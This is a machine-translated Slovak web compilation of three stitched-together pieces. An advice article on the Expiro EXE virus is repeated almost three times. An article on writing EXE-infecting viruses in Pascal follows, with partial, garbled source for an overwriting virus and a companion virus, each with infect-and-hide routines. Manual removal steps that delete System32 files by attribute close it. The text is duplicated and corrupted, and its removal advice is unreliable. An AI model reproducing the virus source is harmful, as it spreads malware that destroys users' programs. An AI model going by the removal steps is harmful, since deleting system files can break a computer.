Mnoho používateľov internetu dnes „zachytáva“ trochu nezvyčajné vírusy, ktoré ovplyvňujú spustiteľné súbory, a to dokonca takým spôsobom, že nie všetky antivírusové programy si s nimi dokážu poradiť. Pokúsme sa zistiť, čo sa dá v takejto situácii urobiť, a zároveň zvážiť problém, ako odstrániť vírus „EXE“ z jednotky flash.
Situácia s prejavom aktivity vírusov tohto typu nie je nová. Toto sa už stalo. Najbežnejší počítačový trójsky kôň sa dnes nazýva Virus.Win32.Expiro (verzie „w“, „ao“, „bc“ atď.).
Môžete si ho celkom jednoducho vyzdvihnúť na internete a potom premýšľať, čo s ním robiť a ako ho odstrániť. Vírus vymaže súbory EXE, alebo skôr ich zneprístupní na vykonanie. Nie je prekvapujúce, že pri pokuse o otvorenie akéhokoľvek programu alebo aplikácie systém vplyvom škodlivého vírusového kódu nerozpozná spustiteľný súbor a zobrazí hlásenie, že taký a taký súbor nebol nájdený.
Najsmutnejšie je, že sa to netýka len nainštalovaných programov, ale aj prvého spustenia inštalátora (teda ak bola distribúcia stiahnutá z internetu a nachádza sa na pevnom disku). Ak inštalujete program z optického média, vplyv hrozby sa môže objaviť neskôr, po dokončení procesu inštalácie. Asi netreba hovoriť, že keď spustíte proces inštalácie z USB disku, vírus naň automaticky naskočí a infikuje všetky súbory s príponou .exe.
Účinok vírusu však možno rozpoznať až vtedy, keď sa spustí spustiteľný súbor. Preto niektoré antivírusové balíky až do spustenia súboru neidentifikujú hrozby a prítomnosť vírusu sa vôbec nezistí.
Pozrime sa, čo a ako odstrániť. Vírus vymaže EXE súbory alebo ich zablokuje v v tomto prípade nevadí. Ako sa však ukázalo, je tu dvojsečná zbraň. Na jednej strane máme do činenia so súbormi, ktoré blokuje samotný vírus, a na druhej strane antivírusové programy reagujú nesprávne.
Napríklad dnes existuje pomerne veľa prípadov, keď ten istý balík Avast stále deteguje vírus po užívateľom zadanej kontrole (a nie vtedy, keď hrozba pôvodne prenikne). Pravda, definícia sa scvrkáva len na to, že zobrazuje infikované EXE súbory a z dôvodu nemožnosti liečby ich bez rozdielu maže. Tu je situácia pre vás. Zdá sa, že všetko je jednoduché: každý vie, čo a ako odstrániť. Vírus dokonca nemaže EXE súbory sám, ale (paradoxne!) to robí pomocou antivírusového skenera. Prirodzene, takýto škodca je schopný vytvárať kópie seba samého a zamaskovať sa systémové procesy typu svchost.
Čo sa týka boja proti takejto hrozbe, nie všetko je jednoduché. V prvom rade možno väčšine používateľov odporučiť, aby nepoužívali bezplatné antivírusové programy a nástroje, ako sú Avast, AVG atď. V krajnom prípade by bolo lepšie mať v systéme cloudový antivírus ako Panda.
Väčšina najlepšia možnosť– výkonný antivírusový softvér od spoločnosti Kaspersky Lab alebo ESET Corporation. Mimochodom, môžete sa uchýliť k nástrojom, ako je Kaspersky Virus Nástroj na odstránenie, ale najskôr program vo formulári prenosná verzia musíte ho napáliť na optický disk pomocou neinfikovaného počítača a spustiť ho z média CD alebo DVD.
V opačnom prípade nie je zaručená úspešná liečba.
Môžete tiež použiť malé programy ako CureIt, ktoré v skutočnosti liečia infikované súbory a nie ich vymazávajú. Ale keďže vírus spravidla „sedí“. RAM
, najoptimálnejším riešením by bolo použitie programov so všeobecným názvom Rescue Disc na spustenie z optického média.
Záver
Vo všeobecnosti si myslím, že niektoré tipy pomôžu väčšine používateľov pochopiť, ako odstrániť vírus. Či už samotný vírus vymaže EXE súbory alebo vykoná neoprávnené blokovanie spustiteľných súborov, nepochopíte okamžite. Ak však existuje čo i len najmenšie podozrenie na jeho prítomnosť, dôrazne sa odporúča nespúšťať žiadny program, kým sa nedokončí úplný proces skenovania, dezinfekcie súborov a odstránenia hrozby. Okrem iného je vhodné mať nejaký balíček ako schopné zabrániť prenikaniu hrozby v počiatočnom štádiu.
Mnoho používateľov internetu dnes „zachytáva“ trochu nezvyčajné vírusy, ktoré ovplyvňujú spustiteľné súbory, a to dokonca takým spôsobom, že nie všetky antivírusové programy si s nimi dokážu poradiť. Pokúsme sa zistiť, čo sa dá v takejto situácii urobiť, a zároveň zvážiť problém, ako odstrániť vírus „EXE“ z jednotky flash.
Situácia s prejavom aktivity vírusov tohto typu nie je nová. Toto sa už stalo. Najbežnejší počítačový trójsky kôň sa dnes nazýva Virus.Win32.Expiro (verzie „w“, „ao“, „bc“ atď.).
Môžete si ho jednoducho vyzdvihnúť na internete a potom premýšľať o tom, čo s ním a súbormi EXE robiť, alebo skôr ich znemožňuje vykonať. Nie je prekvapujúce, že pri pokuse o otvorenie akéhokoľvek programu alebo aplikácie systém vplyvom škodlivého vírusového kódu nerozpozná spustiteľný súbor a zobrazí hlásenie, že taký a taký súbor nebol nájdený.
Najsmutnejšie je, že sa to netýka len nainštalovaných programov, ale aj prvého spustenia inštalátora (teda ak bola distribúcia stiahnutá z internetu a nachádza sa na pevnom disku). Ak inštalujete program z optického média, vplyv hrozby sa môže objaviť neskôr, po dokončení procesu inštalácie. Asi netreba hovoriť, že keď spustíte proces inštalácie z USB disku, vírus naň automaticky naskočí a infikuje všetky súbory s príponou .exe.
Účinok vírusu však možno rozpoznať iba vtedy, keď sa spustí spustiteľný súbor. Preto niektoré antivírusové balíky až do spustenia súboru neidentifikujú hrozby a prítomnosť vírusu sa vôbec nezistí.
Pozrime sa, čo a ako odstrániť. Vírus vymaže súbory EXE alebo ich zablokuje, v tomto prípade na tom nezáleží. Ako sa však ukázalo, je tu dvojsečná zbraň. Na jednej strane máme do činenia s blokovaním súborov samotným vírusom, na druhej strane nesprávnou odozvou antivírusových programov.
Napríklad dnes existuje pomerne veľa prípadov, keď ten istý balík Avast stále deteguje vírus po užívateľom zadanej kontrole (a nie vtedy, keď hrozba pôvodne prenikne). Pravda, definícia sa scvrkáva len na to, že zobrazuje infikované EXE súbory a z dôvodu nemožnosti liečby ich bez rozdielu maže. Tu je situácia pre vás. Zdá sa, že všetko je jednoduché: každý vie, čo a ako odstrániť. Vírus nevymazáva ani EXE súbory sám, ale (paradoxne!) to robí ručne. Prirodzene, takýto škodca je schopný vytvárať si vlastné kópie a maskovať sa aj ako systémové procesy ako svchost.
Čo sa týka boja proti takejto hrozbe, nie všetko je jednoduché. V prvom rade možno väčšine používateľov odporučiť, aby nepoužívali bezplatné antivírusové programy a nástroje, ako sú Avast, AVG atď. V krajnom prípade by bolo lepšie mať v systéme cloudový antivírus ako Panda.
Najlepšou možnosťou je výkonný antivírusový softvér od spoločnosti Kaspersky Lab alebo ESET Corporation. Mimochodom, môžete sa uchýliť k službám nástrojov, ako je Kaspersky Virus Removal Tool, iba najprv musí byť program vo forme prenosnej verzie zaznamenaný na neinfikovanom počítači a spustený z disku CD alebo DVD. V opačnom prípade nie je zaručená úspešná liečba.
V opačnom prípade nie je zaručená úspešná liečba.
Ale keďže vírus spravidla „sedí“ v RAM, najoptimálnejším riešením by bolo použitie programov so všeobecným názvom Rescue Disc na spustenie z optického média.
Kontrolujú všetky komponenty systému ešte pred jeho spustením. Vo väčšine prípadov je táto metóda účinná. Mimochodom, táto technika je vhodná aj pre flash disky, iba v parametroch skenovania úložných zariadení budete musieť dodatočne zaškrtnúť políčko USB disku.
Vo všeobecnosti si myslím, že niektoré tipy pomôžu väčšine používateľov pochopiť, či sú súbory EXE samy o sebe vírusom alebo blokujú spustiteľné súbory bez povolenia, čo okamžite nepochopíte. Ak však existuje čo i len najmenšie podozrenie na jeho prítomnosť, dôrazne sa odporúča nespúšťať žiadny program, kým sa nedokončí úplný proces skenovania, dezinfekcie súborov a odstránenia hrozby.
Okrem iného je vhodné mať v systéme nejaký balík Internet Security, ktorý dokáže zabrániť prieniku hrozieb v počiatočnej fáze.
Väčšina používateľov internetu dnes čelí problému, keď sa ich počítač nakazí nezvyčajnými vírusmi, ktoré majú negatívny vplyv na spustiteľné súbory. Okrem toho nie všetky antivírusové programy sa s nimi dokážu vyrovnať.
Problém s aktivitou vírusov tohto typu nie je nový. Najbežnejší počítačový trójsky kôň sa dnes nazýva Virus.Win32.Expiro. Nie je také ťažké ho vyzdvihnúť na internete, oveľa ťažšie je zbaviť sa škodcu neskôr. Tento vírus schopný vymazať EXE súbory. Presnejšie povedané, zneprístupňuje ich používateľovi. Keď sa teda pokúsite otvoriť určitý program po vystavení kódu škodlivého vírusu, systém nerozpozná spustiteľný súbor. V dôsledku toho sa na obrazovke zobrazí správa, že požadovaný objekt nebol nájdený. Stojí za zmienku, že to platí nielen pre nainštalované programy, ale aj k prvému spusteniu inštalátora. Hovoríme o distribučnej súprave stiahnutej z internetu a umiestnenej na pevnom disku.
Ak nainštalujete program z optického média, vplyv hrozby sa môže prejaviť neskôr, keď sa tento proces dokončí. Ako viete, pri inštalácii z USB disku naň vírus automaticky preskočí a infikuje všetky súbory, ktoré majú príponu .exe. Účinok vírusu však možno rozpoznať až po spustení spustiteľného súboru. Preto, kým sa tento proces neuskutoční, väčšina antivírusové balíky hrozby nie sú identifikované. Navyše sa prítomnosť vírusu vôbec nezistí.
Problémy s antivírusovým softvérom
Stojí za to podrobnejšie zvážiť, čo je možné odstrániť a akým spôsobom. Vírus je schopný zbaviť sa EXE súborov alebo ich zablokovať. Nie je to až také dôležité. V oboch prípadoch je to dvojsečná zbraň. Ako viete, problém je v tom, že súbory sú blokované samotným vírusom. zároveň hovoríme o o nesprávnej reakcii antivírusových programov. Napríklad dnes existuje veľa prípadov, keď balík Avast alebo akýkoľvek iný antivírus deteguje vírus počas kontroly zadanej používateľom.
Avšak, výsledok tento proces To sa scvrkáva len na to, že program zobrazuje infikované EXE súbory. Keď sa nedajú vyliečiť, bez varovania ich sama odstráni. Preto stojí za to povedať, že vírus nevymazáva súbory EXE sám, ale robí to pomocou antivírusového skenera. Treba poznamenať, že prezentovaný škodca je schopný vytvárať kópie a dokonca sa maskovať ako systémové procesy ako svchost.
Postup odstránenia vírusu z infikovaných EXE súborov Ak vezmeme do úvahy boj s takouto hrozbou, všetko nie je také jednoduché, ako by sa na prvý pohľad mohlo zdať. Najprv je vhodné prestať používať bezplatné antivírusové programy ako Avast, AVG a iné. Ideálna možnosť bude prítomnosť cloudového antivírusu ako Panda v systéme. Odporúča sa používať výkonný antivírus softvér Kaspersky Lab alebo ESET. Okrem toho môžete využívať služby pomocných programov, ako je Kaspersky Virus Removal Tool, ale najprv je potrebné program zapísať do optické médiá ako prenosná verzia. Na tento účel sa používa neinfikovaný počítač a spustenie sa vykonáva z disku CD alebo DVD.
Ak sa tieto odporúčania nedodržiavajú, je ťažké zaručiť úspešnú liečbu. Okrem toho môžete použiť viac jednoduché programy ako CureIt. Ich činnosť je zameraná špecificky na liečbu infikovaných súborov a nie na ich odstránenie. Keďže vírus sa zvyčajne nachádza v pamäti RAM, správnym riešením by bolo spustiť z optický disk programy súhrnne známe ako Rescue Disc. Pred spustením sú schopní skontrolovať všetky komponenty systému. Veľmi často sa táto metóda stáva efektívnou. Stojí za zmienku, že táto technika je optimálne vhodná pre flash disky. V tomto prípade však v nastaveniach skenovania úložných zariadení musíte dodatočne nastaviť zaškrtávacie políčko na USB disku.
Dúfame, že tieto odporúčania budú užitočné pre väčšinu používateľov. Pomôžu používateľom zistiť problém, ako odstrániť vírus. Ak existuje čo i len najmenšie podozrenie na jeho prítomnosť, je nežiaduce spustiť akýkoľvek program, kým sa nedokončí celý proces. Odporúča sa tiež získať nejaký balík, ako je Internet Security, ktorý môže zabrániť vplyvu hrozby na začiatku etapa.
Tento článok hovorí o vírusy, infikovanie EXE súbory. Klasifikácia takýchto vírusy, sú podrobne diskutované algoritmy ich práce, rozdiely medzi nimi, výhody a nevýhody.
Vírusy- toto je dobrá gymnastika pre myseľ, aj keď veľa ľudí premýšľa o tom, čo napísať vírus v jazyku vysokej úrovni veľmi ťažké. Nie je to celkom pravda. Napíšte na jazyk Pascal celkom jednoducho, hoci veľkosť výsledného kódu vzbudzuje úctu.
Pre každý typ vírusy Uvádzajú sa aj zdrojové texty s podrobným komentárom EXE programy.
COM súbory(malé programy napísané primárne v jazyku Assembler) pomaly, ale isto zastarávajú. Nahrádzajú ich tie, ktoré svojou veľkosťou odstrašujú. EXE-„monštrá“. Objavili sa aj vírusy, ktoré môžu infikovať EXE súbory.
Štruktúra a proces načítania EXE programu
Na rozdiel od COM programy,EXE programy môže pozostávať z niekoľkých segmentov (kód, dáta, zásobník). Môžu zaberať viac ako 64 KB. EXE súbor má hlavičku, ktorá sa používa pri načítaní Hlavička pozostáva z naformátovanej časti obsahujúcej podpis a údaje potrebné na načítanie EXE súbor a tabuľky na nastavenie adries ( Tabuľka premiestňovania). Tabuľka pozostáva z hodnôt vo formáte segment:offset. Po načítaní programu do pamäte musí byť adresa segmentu, z ktorej bol program načítaný, pridaná k ofsetom v zavádzacom module označeným hodnotami v tabuľke.
Pri spustení EXE programy Zavádzač systému (volajúci funkciu DOS 4Bh) vykonáva nasledujúce akcie:
1. Určite adresu segmentu oblasti voľnej pamäte, veľkosť
čo je dostatočné na hosťovanie programu.
2. Vytvorí sa a naplní sa pamäťový blok pre premenné prostredia.
3. Pre PSP a program sa vytvorí pamäťový blok (segment YOOOO - PSP;
segment + OOOYOOOOOO - program).
Zodpovedajúce hodnoty sa zadajú do polí PSP.
4. Adresa DTA je nastavená na PSP:0080h.
5. Naformátovaná časť sa načíta do pracovnej oblasti nakladača
hlavička EXE súbor.
6. Dĺžka nakladacieho modulu sa vypočíta podľa vzorca:
Si7.e=((PageCnt*5i2)-(HdrSae*i6))-Pa!tP3ig.
7. Určí sa posun modulu načítania v súbore, rovný
8. Vypočíta sa adresa segmentu (START_SEG) pre načítanie – zvyčajne je to PSP+lOh.
9. Zavádzací modul sa načíta do pamäte (začínajúc od adresy
START_SEG:0000).
10. Pre každý vstup tabuľky nastavenia:
a) slová I_OFF a I_SEG sa prečítajú;
b) vypočíta sa RELC^SEG-START^SEG+LSEG;
c) prečítať slovo na adrese RELO_SEG:I_OFF;
d)K prečítanému slovu sa pridá START_SEG;
e) výsledok sa uloží na rovnakú adresu (RELO_SEG:I_OFF).
11. Pamäť pre program je pridelená v súlade s MaxMet
12. Registre sú inicializované, program sa spustí:
b) AX = výsledok kontroly správnosti identifikátorov ovládača zadaných na príkazovom riadku;
c)SS°START_SEG+ReloSS, SP-ExeSP;
d)CS=START_SEG+ReloCS, IP=ExeIP.
Klasifikácia EXE vírusov
EXE vírusy možno podmienečne rozdeliť do skupín pomocou vlastností algoritmu ako znaku pre rozdelenie. VírusyPrepísať) Takéto vírusy sa už stali vzácnosťou. Ich hlavnou nevýhodou je, že sú príliš hrubé. Infikované programy sa nespustia, pretože vírus sa zapíše cez kód programu bez jeho uloženia. Pri spustení vírus vyhľadá ďalšiu obeť (alebo obete), nájde nájdený súbor otvorí na úpravu a zapíše jeho telo na začiatok programu bez uloženia pôvodného kódu. Infikované týmito vírusy programy nepodliehajú liečbe.
Sprievodné vírusy
Tieto vírusy dostali svoje meno kvôli reprodukčnému algoritmu:
Pre každý infikovaný súbor sa vytvorí satelitný súbor. Pozrime sa bližšie na dva typy vírusov v tejto skupine:
Vírusy prvý typ reprodukuje nasledovne. Pre každú infikovanú osobu EXE súbor v rovnakom adresári sa vytvorí súbor s kódom vírusu s rovnakým názvom ako EXE súbor, ale s predĺžením COM. Vírus aktivuje sa, ak je pri spustení programu na príkazovom riadku zadaný iba názov spustiteľného súboru. Ide o to, že ak nie je špecifikovaná prípona súboru, DOS najprv vyhľadá v aktuálnom adresári súbor s daným názvom a príponou COM. Ak COM súbor s týmto názvom nebol nájdený, prebieha hľadanie rovnakého mena EXE súbor. Ak sa nenájde a EXE súbor DOS sa pokúsi zistiť DPH(dávkový) súbor. Ak sa v aktuálnom adresári nenachádza žiadny spustiteľný súbor s zadané meno vyhľadávanie sa vykonáva vo všetkých adresároch prístupných premennou PATH. Inými slovami, keď chce používateľ spustiť program a na príkazový riadok zadá iba jeho názov (robia to väčšinou všetci), prvý dostane kontrolu vírus, ktorého kód je v COM súbor. On tvorí COM súbor do jedného alebo viacerých EXE súbory(šíri sa) a potom vykoná EXE súbor s názvom zadaným v príkazovom riadku. Používateľ si myslí, že funguje iba spustený EXE program.
Neutralizujte satelitný vírus celkom jednoduché - stačí odstrániť
COM súbor.
Vírusy druhý typ pôsobí jemnejšie. Meno infikovanej osoby
EXE súbor zostáva rovnaký a rozšírenie je nahradené niektorými
iný ako ten, ktorý sa vykonáva ( COM, EXE a BAT), napr.
súbor môže dostať príponu DAT(dátový súbor) príp OVL(pre-
gramové prekrytie). Potom na miesto EXE súbor skopírované vírusový kód. Keď sa takýto infikovaný program spustí, kontrolu získa vírusový kód nachádzajúci sa v EXE súbor. Infikovaním jedného alebo viacerých EXE súbory rovnakým spôsobom vírus vráti pôvodnú príponu spustiteľného súboru (ale nie E ON a COM, pretože EXE súbor s týmto názvom je obsadený vírusom), potom ho spustí. Keď je infikovaný program spustený, jeho spustiteľný súbor sa vráti na nespustiteľnú príponu. Dezinfekcia súborov infikovaných týmto typom vírusu môže byť ťažké, ak vírus-Sputnik zašifruje časť alebo celé telo infikovaného súboru a pred spustením ho dešifruje.
Vírusy, vložený do programu (Parazitický) Vírusy tohto typu sú najnenápadnejšie: ich kód sa zapíše do infikovaného programu, čo je nevyhnutné sťažuje liečbu infikované súbory. Pozrime sa na spôsoby implementácie EXE vírusy v súbore EXE.
Spôsoby infikovania súborov EXE
Najbežnejšia metóda infekcie EXE súbory takto: telo sa pripojí na koniec súboru vírus a hlavička je upravená (pri zachovaní originálu) tak, aby pri spustení infikovaného súboru bola prijatá kontrola vírus. Vyzerá to na infekciu COM súbory, ale namiesto nastavenia kódu na začiatok vírusu sa opraví skutočná adresa bodu spustenia programu. Vírus po ukončení svojej práce prevezme z uloženej hlavičky pôvodnú adresu spustenia programu, do svojej segmentovej zložky pridá hodnotu registra DS alebo ES (získanú pri štarte vírusu) a na prijatú adresu odovzdá riadenie.
Ďalšia metóda - injekcia vírusu na začiatok súboru s posunom kódu
programy. Mechanizmus infekcie je nasledovný: telo infikovaný program načítať do pamäte, zapísať na jej miesto kód vírusu a po ňom - kód infikované programy s. Programový kód je teda v súbore akoby „posunutý“ o dĺžku kódu vírusu. Odtiaľ pochádza názov metódy - „metóda posunu“. Pri spustení infikovaného súboru vírus infikuje jeden alebo viac súborov. Potom načíta programový kód do pamäte a zapíše ho do špeciálne vytvoreného dočasného súboru na disku s príponou spustiteľného súboru ( COM alebo EXE) a potom spustí tento súbor. Keď program skončí, dočasný súbor sa vymaže. Ak pri vytváraní vírusu neboli použité žiadne ďalšie ochranné techniky, potom je vyliečenie infikovaného súboru veľmi jednoduché – stačí odstrániť kód vírusu na začiatku súboru a program bude opäť funkčný. Nevýhodou tohto spôsobu je, že je potrebné načítať celý kód infikovaného programu do pamäte (a vyskytujú sa aj inštancie väčšie ako 1 MB).
Ďalší spôsob, ako infikovať súbory - metóda prenosu - zjavne je najpokročilejšia zo všetkých uvedených. Vírus reprodukuje nasledovne: pri spustení infikovaného programu telo vírusčítať z neho do pamäte. Potom sa vykoná vyhľadávanie neinfikovaného programu. Jeho začiatok, rovnako dlhý ako telo, sa načíta do pamäte vírus. Telo je zaznamenané na tomto mieste vírus.Začiatok programu z pamäte sa pripojí na koniec súboru. Odtiaľ pochádza názov metódy - „metóda prenosu“. Po vírus infikoval jeden alebo viac súborov, začne spúšťať program, z ktorého sa spustil. Na tento účel načíta začiatok infikovaného programu, uložený na konci súboru, a zapíše ho na začiatok súboru, čím obnoví funkčnosť programu. Potom vírus odstráni štartovací kód z konca súboru, obnoví pôvodnú dĺžku súboru a spustí program. Po ukončení programu vírus zapíše svoj kód opäť na začiatok súboru a pôvodný začiatok programu na koniec. Dokonca antivírusy, ktoré od spustenia kontrolujú integritu svojho kódu vírus program má presne rovnaký kód ako pred infekciou.
Vírusy, nahrádzajúci kód programu ( Prepísať) Ako už bolo spomenuté, tento druh vírusy je už dávno mŕtvy. Občas sa nájdu aj takí vírusy vytvorené v jazyku Assembler, ale to je skôr súťaž o napísanie najmenších prepísať vírus. Zapnuté momentálne najmenší známy prepísať vírusy napísané Pripomenutie (skupina Death Virii Crew) a zaberá 22 bajtov.
Algoritmus fungovania prepisovacieho vírusu je nasledujúci:
1. Otvorte súbor, z ktorého vírus získal kontrolu.
3. Zatvorte súbor.
4. Podľa masky vyhľadajte súbor vhodný na infekciu.
5. Ak sa nenájdu žiadne ďalšie súbory, prejdite na krok 11.
6. Otvorte nájdený súbor.
7. Skontrolujte, či nájdený súbor nie je infikovaný týmto vírusom.
8. Ak je súbor infikovaný, prejdite na krok 10.
9. Napíšte kód vírusu na začiatok súboru.
10. Zatvorte súbor (ak chcete, môžete infikovať jeden až všetky súbory)
rybolov v katalógu alebo na disku).
11. Zobrazte na obrazovke nejaké chybové hlásenie, napríklad „Abnormálne ukončenie programu“ alebo „ Nie dosť pamäť“ – nech sa užívateľ príliš nečuduje, že sa program nespustil.
12. Ukončite program.
Nižšie je uvedený zoznam programu, ktorý infikuje súbory týmto spôsobom.
(2 048 USD, 0, 0)
(Používa DOS a systémové moduly ( Systémový modul automaticky sa pripojí ku každému programu počas kompilácie))
(názov vírusu)
VirName='Bolesť';
(Linka na kontrolu opätovnej infekcie.
Do infikovaného súboru sa pridá hneď za kód vírus}
VirLabel: String=’Pain!1;
(Dĺžka výslednej kompilácie EXE súbor}
Autor=’Špinavý nacista/SGWW.’;
(Počet infikovaných súborov v jednej relácii)
(Pole na určenie, či existuje kópia vírus v nájdenom súbore)
Virlidentifier: Array of Char;
(Premenná súboru pre prácu so súbormi)
(Ďalšia premenná súboru - aj keď by to šlo aj bez nej, bude to prehľadnejšie)
(Pre názov nájdeného súboru)
TargetFile:PathStr;
(Telesný nárazník vírus)
VirBuf: Pole [-I.VirLen] Char;
(Pre dátum/čas súboru)
(Počítadlo počtu infikovaných súborov)
Dirlnfo:SearchRec;
LabelBuf: Array of Char;
(Inicializácia)
LabelBuf :=VirLabel;
LabelBuf:=VirLabel;
LabelBuf:=VirLabel,
LabelBuf:=VirLabel;
LabelBuf:=VirLabel;
(Vynulujte počítadlo množstva infikované súbory}
(Premennú súboru VirBody spájame s názvom programu, z ktorého sme začali)
Assign(VirBody, ParamStr(O));
(Otvorte súbor s resize=1 bajt)
Reset(VirBody, 1);
(Telo čítame zo spisu vírus do poľa VirBuf)
BlockRead(VirBody VirBuf, VirLen);
(Zavrieť súbor)
(Pátra po obeti)
postup FindTarget;
(Funkcia vráti True, ak je nájdený program už infikovaný, a False, ak ešte nie je)
funkcia VirusPresent: Boolean;
VirusPresent:=False;
(Otvorte nájdený súbor)
Assign(Target, TargetFile);
Reset(Cieľ, 1);
(Prejdeme na dĺžku tela vírus od začiatku súboru)
Seek(Target, VirLen);
(Čítali sme 5 bajtov - ak je súbor už infikovaný, je tam štítok vírus}
BlockRead(Target, Virlidentifier, 5);
Ak Virldentifier=Virl_abel Potom
(Ak existuje značka, potom existuje vírus}
VirusPresent:=True;
(Postup pri infekcii)
postup InfectFile;
(Ak je veľkosť nájdeného súboru menšia ako dĺžka vírusu plus 100 bajtov, ukončite postup)
Ak Sr.Size< VirLen+100 Then Exit;
Ak nájdený program ešte nie je infikovaný, infikujeme ho)
Ak nie je prítomný vírus, potom
(Zapamätajme si dátum a čas súboru. Nie je potrebné si pamätať atribúty, pretože vyhľadávanie sa vykonáva medzi súbormi s atribútom Archive a tento atribút sa v každom prípade umiestni do súboru po uložení)
(Otvorené pre infekciu)
Assign(Target, TargetFile);
Reset(Cieľ, 1);
(Telo záznamu vírus na začiatok súboru)
BlockWrite(Cieľ, VirBuf, VirLen);
(Presuňte ukazovateľ aktuálnej polohy na dĺžku vírus od začiatku súboru)
Seek(Target, VirLen);
(Zadajte označenie infekcie)
BlockWrite(Target, LabelBuf, 5);
(Nastavte dátum a čas súboru)
SetFTime(Cieľ, Čas);
(zatvára sa)
(Zvýšte počítadlo infikované súbory}
(Spustiť postup FindTarget)
(Hľadáme súbory v aktuálnom adresári pomocou masky * .EXE
s atribútmi Archív}
FindFirstF.EXE’, Archive, Sr);
(Pokiaľ existujú súbory na infikovanie)
Kým DosError=0 Do
Ak Sr.Name=»Potom Exit;
(Zapamätáme si názov nájdeného súboru v premennej TargetFile)
TargetFile:=Sr.Name;
(Zavolajte infekčný postup)
(Ak boli infikované súbory InfCount, dokončite vyhľadávanie)
Ak InfFiles > InfCount, potom ukončite;
(Hľadáme ďalší súbor podľa masky)
(Hlavné telo)
(inicializuje sa)
(Hľadáme obete a infikujeme ich)
(Na obrazovke sa zobrazí chybové hlásenie)
WriteLn(‘Abnormálne ukončenie programu.’);
(Toto je na to, aby kompilátor vložil do kódu konštanty VirName a Author, ale podmienka je nastavená tak, že tieto riadky sa na obrazovke nikdy nezobrazia)
WriteLn(VirName);
WriteLn(Autor);
Sprievodné vírusy
Satelitné vírusy teraz rozšírený - pomer spoločník k parazitom vírusy približne jedna z dvoch infekcií metódou tvorby COM súbor satelit Význam tejto metódy je nedotýkať sa „mimozemskej mačky“ ( EXE program), vytvorte si „svoj vlastný“ - COM súbor s menom EXE programy. Algoritmus na to vírus je mimoriadne jednoduché, pretože nie sú potrebné zbytočné akcie (napríklad ukladanie dĺžky kompilovaného súboru EXE súbor s kód vírusu, čítanie do vyrovnávacej pamäte tela vírus, spustite súbor, z ktorého vírus dostal kontrolu). Nie je potrebné ani ukladať značku na zistenie, či je súbor infikovaný.
Infekcia sa vykonáva pomocou príkazového procesora:
1.Ak sú parametre špecifikované v príkazovom riadku, uložte ich do premennej String na prenos do infikovaného programu.
2.Nájdite EXE súbor-obeť.
3.Skontrolujte, či sa nájdená nachádza v adresári EXE súbor COM súbor s rovnakým názvom ako súbor obete.
4.Ak taký COM súbor je prítomný, súbor je už infikovaný, prejdite
k bodu 6.
5. Pomocou príkazového procesora skopírujte súbor, z ktorého
kontrolu do súboru s menom a príponou obete COM.
6.Postup Exes načítať a spustiť súbor s názvom štartovacieho súboru, ale s príponou EXE- to znamená spustiť infikovaný program.
7. Vráťte ovládanie do systému DOS.
Nižšie uvedený zoznam zobrazuje súbory, ktoré sú týmto infikované
(2 048 USD, 0, 0)
(Používajú sa moduly DOS a System (modul System automaticky
pripája sa ku každému programu počas kompilácie))
(názov vírusu)
VirName='Hádaj;
Autor = 'Špinavý nacista/SGWW. Len 4 PVT!‘;
(Množstvo infikovaný pre jednu reláciu pracovných súborov)
(Pre názov nájdeného súboru)
TargetFile:PathStr;
Nie je to ťažké. Začnime!
Ako odstrániť vírus sami
Je potrebné konať s právami správcu.
Najprv musíte otvoriť príkazový riadok. Ak to chcete urobiť, stlačte klávesovú skratku WINDOWS+R a v zobrazenom okne do riadku zadajte cmd a stlačte OK .
príkaz cmd na príkazovom riadku
Alebo kliknutím na tlačidlo Štart v ľavom dolnom rohu obrazovky monitora do vyhľadávacieho panela začnite písať „ príkazový riadok“ a potom kliknite na nájdený výsledok kliknite pravým tlačidlom myši myšou a vyberte " Spustiť ako správca».
Volanie príkazového riadku pomocou vyhľadávania
Spustite príkazový riadok ako správca
Stručne o cieľoch našich budúcich akcií:
Pomocou príkazu prívlastok musíte nájsť súbory, ktoré by nemal byť medzi systémovými súbormi a preto môže byť podozrivý.
Vo všeobecnosti v C:/jednotka by nemala obsahovať žiadne .exe alebo .inf súbory. A v priečinku C:\Windows\System32 tiež by nemal obsahovať žiadne iné súbory ako systémové, skryté alebo len na čítanie s atribútmi i, e S H R.
Otvorte príkazový riadok a vložte ho cmd. Spustite tento súbor ako správca.
Otvorenie cmd
Píšeme do riadku cd/ pre prístup k disku. Potom zadajte príkaz prívlastok. Po každom príkaze nezabudnite stlačiť ENTER:
Tím prívlastok na príkazovom riadku
Ako vidíme na poslednom obrázku, súbory s príponami .exe alebo .inf nenašiel sa.
Vírusy v systéme Windows
Disk C neobsahuje žiadne súbory .exe a.inf, Ahoj tieto súbory si sami ručne nestiahnete. Ak nájdete akýkoľvek súbor podobný tým, ktoré sme našli a zobrazí sa S H R potom by to mohlo byť vírus.
Tu sme našli 2 takéto súbory:
autorun.inf
sscv.exe
Tieto súbory majú prípony .exe a. inf a majú atribútyS H R . To znamená, že tieto súbory môžu byť vírusy .
Teraz vytočte attrib -s -h -g -a -i názov súboru.rozšírenie. Alebo v našom príklade toto:
atribút —s-h -G -a -i autorun.inf
Tento príkaz zmení ich vlastnosti a vytvorí z nich bežné súbory. Potom môžu byť odstránené.
Ak chcete tieto súbory odstrániť, zadajte delnázov súboru.rozšírenie alebo v našom prípade:
del autorun.inf
To isté sa musí urobiť s druhým súborom:
Ručné odstránenie vírusov
Zadajte CDvyhrať* a stlačte ENTER.
Zadajte znova s systém32. Stlačte ENTER.
Potom zadajte príkaz prívlastok. Stlačte ENTER.
Tu je dlhý zoznam:
Zadajte príkaz nižšie znova prívlastok, nezabudnite kliknúť neskôr ZADAJTE:
A nájdeme tieto súbory:
Podozrivé súbory v priečinku Windows
Obrazovka sa pri pohybe nahor a nadol pohybuje veľmi rýchlo, takže keď niečo nové zabliká, zastavte sa a vráťte sa späť a skontrolujte každý súbor bez toho, aby ste vynechali jediný.
Podozrivé súbory v priečinku Windows
Všetko, čo nájdeme, si zapíšeme SHR súbory:
Spustite príkaz prívlastok 3 alebo 4 krát, aby ste sa uistili, že ste všetko skontrolovali.
Tu máš. Nezávisle sme našli až 4 škodlivý súbor! Teraz musíme odstrániť tieto 4 vírusy.
C:\Windows\System32> attrib -s -h -r -a -i atr.inf
C:\Windows\System32> del atr.inf
C:\Windows\System32> attrib -s -h -r -a -i dcr.exe
C:\Windows\System32> del dcr.exe
C:\Windows\System32> attrih -s -h -r -a -i desktop.ini
C:\Windows\\System32> z desktop.ini
C:\Windows\System32> attrib -s -h -r -a -i idsev.exe
C:\Windows\System32> del idsev.exe
Odstránenie vírusov z počítača sami
